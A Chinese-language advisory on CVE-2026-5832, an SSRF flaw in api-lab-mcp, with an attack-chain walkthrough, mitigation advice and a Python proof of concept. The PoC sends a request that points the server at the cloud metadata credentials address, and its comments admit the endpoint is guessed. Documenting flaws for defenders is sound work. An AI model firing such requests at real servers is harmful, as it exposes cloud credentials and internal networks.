CVE-2026-5832 api-lab-mcp SSRF漏洞

漏洞信息

漏洞编号

CVE-2026-5832

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

atototo api-lab-mcp

漏洞概述

atototo/api-lab-mcp组件0.2.1及之前版本存在高危SSRF漏洞。该漏洞源于src/mcp/http-server.ts文件中处理HTTP接口请求的函数未对用户提供的source或url参数进行有效过滤。未经身份验证的远程攻击者可利用此缺陷操纵服务器端发起恶意请求，探测或攻击内网资源。目前漏洞利用代码已公开，厂商暂未发布修复补丁。

技术细节

该漏洞位于atototo/api-lab-mcp项目的HTTP服务器模块中。具体而言，文件src/mcp/http-server.ts中的analyze_api_spec、generate_test_scenarios及test_http_endpoint等函数在处理外部输入时，直接将用户通过HTTP请求提交的source或url参数传递给后端的请求发起逻辑，而未对此参数进行合法性的校验或地址白名单限制。这种不安全的实现方式允许攻击者通过构造恶意URL（如file://、http://内网地址等），诱导服务器代为执行请求。由于CVSS向量显示无需用户交互且无需认证，攻击者可远程发送特制数据包，利用该漏洞读取本地敏感文件、扫描内网端口或攻击内部脆弱服务，造成信息泄露或服务中断。

攻击链分析

STEP 1

侦察

攻击者发现目标服务器运行了atototo api-lab-mcp 0.2.1或更早版本，且HTTP接口暴露在公网。

STEP 2

构造攻击载荷

攻击者构造包含恶意URL（如内网地址、云元数据地址或DNSLog地址）的HTTP请求，将其赋值给source或url参数。

STEP 3

发送恶意请求

攻击者向src/mcp/http-server.ts中定义的受影响函数（如analyze_api_spec）发送上述恶意请求。

STEP 4

服务端请求执行

服务器解析请求参数，未经验证直接向攻击者指定的URL发起HTTP请求，导致SSRF触发。

STEP 5

结果回显与利用

攻击者根据响应内容或通过DNSLog/带外通道获取内网信息，进一步进行内网渗透。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_ssrf(target_url, malicious_url):
    """
    PoC for CVE-2026-5832 SSRF vulnerability in api-lab-mcp.
    Sends a request to the vulnerable endpoint with a malicious url parameter.
    """
    # The vulnerable endpoint might be one of the mentioned functions.
    # Assuming a JSON structure based on typical API testing tools.
    endpoint = f"{target_url}/test_http_endpoint"
    payload = {
        "url": malicious_url
    }

    try:
        print(f"[*] Sending request to {endpoint} with payload: {payload}")
        response = requests.post(endpoint, json=payload, timeout=10)
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response: {response.text}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Example: Attempting to access AWS metadata (common SSRF target)
    target = "http://vulnerable-server:port"
    internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    exploit_ssrf(target, internal_target)

影响范围

atototo api-lab-mcp <= 0.2.1

防御指南

临时缓解措施

由于官方尚未修复，建议立即在防火墙层面限制该服务的出站流量，仅允许访问必要的API地址。对于非必须的公网访问实例，建议暂时关闭服务或将其迁移至隔离网络环境，以防被自动化工具扫描并利用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5832
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5832
3 Details https://www.cvedetails.com/cve/CVE-2026-5832/
4 VulDB https://vuldb.com/cve/CVE-2026-5832
5 Link https://github.com/BruceJqs/public_exp/issues/6
6 Link https://github.com/atototo/api-lab-mcp/
7 Link https://github.com/atototo/api-lab-mcp/issues/4
8 Link https://vuldb.com/submit/789765
9 Link https://vuldb.com/vuln/356288
10 Link https://vuldb.com/vuln/356288/cti